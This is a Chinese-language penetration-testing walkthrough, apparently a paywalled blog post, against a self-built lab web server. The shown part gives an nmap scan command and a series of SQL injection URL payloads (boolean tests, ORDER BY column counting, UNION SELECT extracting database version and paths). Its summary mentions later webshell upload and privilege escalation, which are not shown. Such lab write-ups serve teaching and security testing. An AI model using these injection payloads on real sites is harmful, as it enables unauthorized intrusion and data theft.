本文详细介绍了进行渗透测试的过程,从信息收集开始,利用nmap扫描发现80、8080端口开放。通过sql注入找到数据库信息、用户账号和密码。尝试使用sqlmap获取更多数据,并成功登陆后台。接着利用上传文件漏洞上传木马,通过提权操作最终获取管理员权限。整个过程揭示了网站安全的重要性和渗透测试的步骤。
1. 信息收集
内网搭建的一个服务器
nmap扫描服务器端口
nmap -sV -sC -sT -p- 192.168.20.157 
可以看到22、80、8080端口都是开启的 可以针对他们的版本号网上搜集漏洞来利用
这里就只访问80端口的web页面
寻找可能存在sql注入的目录 测试该子目录是否存在sql注入
http://192.168.20.157/storypage_04.php?id=115%20and%201=1 
http://192.168.20.157/storypage_04.php?id=115%20and%201=2 
确定存在sql注入
2. sql注入漏洞利用
获取服务器和数据的信息
通过order by 命令来判断当前表的列数为13
http://192.168.20.157/storypage_04.php?id=115%20order%20by%2013 
http://192.168.20.157/storypage_04.php?id=115%20order%20by%2014 
通过union联合查询来知道显示的列数是什么位置
http://192.168.20.157/storypage_04.php?id=-115%20union%20select%20111,222,333,444,555,666,777,888,999,1010,1111,1212,1313 
通过union注入点获取数据库和系统的相关信息
http://192.168.20.157/storypage_04.php?id=-115%20union%20select%20version(),database(),3,4,5,6,@@basedir,8,9,10,11,@@datadir,13
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
